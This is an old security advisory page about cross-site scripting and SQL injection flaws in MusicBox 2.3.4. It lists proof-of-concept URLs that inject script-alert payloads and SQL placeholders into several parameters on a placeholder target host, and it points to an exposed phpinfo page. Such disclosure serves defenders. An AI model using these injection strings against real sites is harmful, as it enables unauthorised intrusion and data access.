MusicBox <= 2.3.4 XSS SQL injection Vulnerability

2006.07.27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script> &page=0 http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/) </script>&page=0 http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/ )</script>&in=song&action=search&start=0 http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/Ell ipsisSecurityTest/)</script> http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSe curityTest/)</script>&type=Artists ------------- SQL injection ------------- http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQ L] http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL] ----------------- Ellipsis Security http://www.ellsec.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top